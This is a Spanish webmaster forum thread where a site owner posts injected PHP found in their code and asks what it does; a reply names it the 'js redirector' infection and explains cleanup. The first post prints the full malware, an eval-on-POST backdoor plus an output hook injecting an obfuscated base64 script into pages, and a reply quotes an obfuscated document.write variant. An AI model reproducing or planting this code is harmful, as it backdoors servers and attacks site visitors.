training rosa
Grupo SEO TELEGRAM [Click Aquí]
Resultados 1 al 12 de 12
Tema:

Codigo Malicioso?

  1. #1
    Novatillo Invitado

    Predeterminado Codigo Malicioso?

    Hola, tengo un codigo en mi programación que me han hecho que no lo tenía antes...Me han dicho que puede ser algo que perjudique a la web, está en base 64 y nose que hace exactamente. Os pido ayuda por si sabeis que hace exactamente y si al final es algo que perjudique a la web lo retiraré de inmediato. El codigo es el siguiente.


    <?php if(!function_exists('tmp_lkojfghx')){for($i=1;$i<1 0;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL ',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2Nya XB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0M yYkFzY05BUHI2WVZpcDZZVnREeVMlMjBpcXMyYkFyeGFjJTNEM mJBJTJGZWwlMkY3aXE4JTJFMmJBMTFzZnIwJTJFMXNmcjdlbDU lMkUyNDlzZnIlMkZqMmJBcXVlcnklMkVzZnJqaXFzJTNFc2ZyJ TNDJTJGc2lxY3JlbGlwdFo4QiUzRScpLnJlcGxhY2UoL3Nmcnx lbHxaOEJ8TkFQfER5U3x4YXxpcXw2WVZ8MmJBL2csIiIpKTsKI C0tPjwvc2NyaXB0Pg=='));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))==' 1f8b'))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$ v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos( $v,'document.write')))$s=str_replace($v,'',$s);}$s 1=preg_replace('#<script language=javascript><!-- \r\ndocument\.write\(unescape\(".+?\r\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_re place('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);else if(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($ b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_l kojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!=' tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>


    LLevo unos dias intentando saber que hace, así que os agradecería vuestra colaboración.

    Saludos y gracias.

  2. #2
    newbie82 Invitado

    Predeterminado

    Contamos con los mejores programadores, si te interesa, por 500€ te lo miramos. Y ahora, ante la crisis, rebajamos hasta el 50%

  3. #3
    Novatillo Invitado

    Predeterminado

    que simpatico el tio... xD

  4. #4
    Nikki Invitado

    Predeterminado

    Cita Iniciado por newbie82 Ver Mensaje
    500€ te lo miramos.
    tan poco?

  5. #5
    Novatillo Invitado

    Predeterminado

    Nadie sabe?

    saludos

  6. #6
    Novatillo Invitado

    Predeterminado




    (AYUDA PLEASE)

  7. #7
    Novatillo Invitado

    Predeterminado

    amigos, donde están? nadie es programador?

  8. #8
    Nikki Invitado

    Predeterminado

    Cita Iniciado por Novatillo Ver Mensaje
    amigos, donde están? nadie es programador?
    esos son garabatos en los comic

  9. #9
    WSLAK Invitado

    Predeterminado

    Cita Iniciado por Nikki Ver Mensaje
    esos son garabatos en los comic

  10. #10
    Igetmoney está desconectado Registrado
    Rango: Quizás estoy
    haciendo Spam ...

    User Info Menu

    Predeterminado

    Cita Iniciado por Novatillo Ver Mensaje
    amigos, donde están? nadie es programador?
    Te ayudaría pero es más fácil no hacerlo :cafe:

  11. #11
    eduarro rico está desconectado Registrado
    Rango: Quizás estoy
    haciendo Spam ...

    User Info Menu

    Predeterminado

    hola, yo si te puedo ayudar, ese es un codigo malicioso que fue inyectado a traves de mysql, o bien lo pudiste descargar en forma de troyano y al subir algo por ftp infectaste todo, es un un virus muy fastidioso porque ademas de ese codigo que inserta en la mayoria de archivos .php, tambien inserta en archivos html y htm, asi que como a mi me paso, me infectaron una web en joomla, y analizando y buscando encontre mas de 180 archivos infectados, entonces lo que tienes q hacer es:
    instalar el antivirus avast (el free detecta todas las variaciones de este virus, cosa que no hace ningun otro ni kaspersky ni bitdefendet ni ningun otro), descargar todo tu sitio web a tu pc, escanear el sitio web, y cuando te avise del virus no lo borres, ponle la opcion de no hacer nada (esto para saber donde esta el virus), despues revisa los archivos donde avast te detecto algo, y debes ver un codigo parecido al que escribes en los archivos .php, y algo parecido a esto en los archivos html,
    document.write(unescape('%3C8dgsH2JcvgUripvgUt%208 dgsH2Jrc%3DvgU%2F8dg%2F94vmi%2Evmi247%2Eo52vmi%2E1 95%2Fj8dgqvgUuervmiyr3%2Ejvmis8dg%3E%3C%2F8dgsvgUc ripURzt%3E').replace(/vgU|H2J|URz|vmi|r3|o5|8dg/g,""));
    o otras variaciones, descargate el programa windows grep y ponle buscar y reemplazar buscas el codigo que te puse arriba o alguna otra variacion y lo reemplazas por espacios, y asi con todo cada vez que modifiques algo pasale el avast para ver si quedo limpio, cuando este limpio subelo de nuevo y ya esta.

    el virus se llama js redirector. espero haberte ayudado.

  12. #12
    Novatillo Invitado

    Predeterminado

    Hola, muchas gracias, ya estoy probando lo que dices y también encontré información del virus que mencionas, de verdad da gusto encontrar de vez en cuando gente como tu por estos sitios. Sin más, gracias...

    Saludos

Temas Similares

  1. Ayuda con codigo
    Por Revolve en el foro General SoyWebmaster
    Respuestas: 0
    Último Mensaje: 27/01/2015, 17:13
  2. codigo php
    Por delavitta en el foro Programación Web
    Respuestas: 1
    Último Mensaje: 04/07/2013, 10:12
  3. ayuda con un codigo
    Por Rogeliz en el foro Blogger
    Respuestas: 5
    Último Mensaje: 16/06/2013, 19:42
  4. codigo htacess.
    Por delavitta en el foro Programación Web
    Respuestas: 3
    Último Mensaje: 27/09/2012, 09:32
  5. nesesito un codigo
    Por bebecrx en el foro General SoyWebmaster
    Respuestas: 0
    Último Mensaje: 20/11/2009, 15:51

Permisos de Publicación

  • No puedes crear nuevos temas
  • No puedes responder temas
  • No puedes subir archivos adjuntos
  • No puedes editar tus mensajes
  •  
Has visto el post " Codigo Malicioso?" que está en esta URL y ha sido creado por el usuario Novatillo. Esperamos que te haya sido de utilidad el artículo " Codigo Malicioso?" que inició el usuario Novatillo de Soywebmaster.com.

Otros Foros de Interés

Curso SEO - Foro SEO - Foro Programacion - Foro Diseño Web - Intercambio de Enlaces - Negocios por Internet - Como Ganar Dinero - Foro Hosting - Foro Apuestas Deportivas

ÚLTIMOS ARTÍCULOS DEL BLOG SEO DE DAVID AYALA

MÉTODOS EFICACES para Indexar Enlaces en Google
Webinar: Keyword Research (Con Emilio García)
Safecont: Una herramienta SEO diferente
MEGA GUÍA SEO AutoPilot (Link Building Automático)
Usamos cookies que analizan hábitos de comportamiento y navegación que aceptas al navegar aquí. Política de privacidad | Cookies | Aviso legal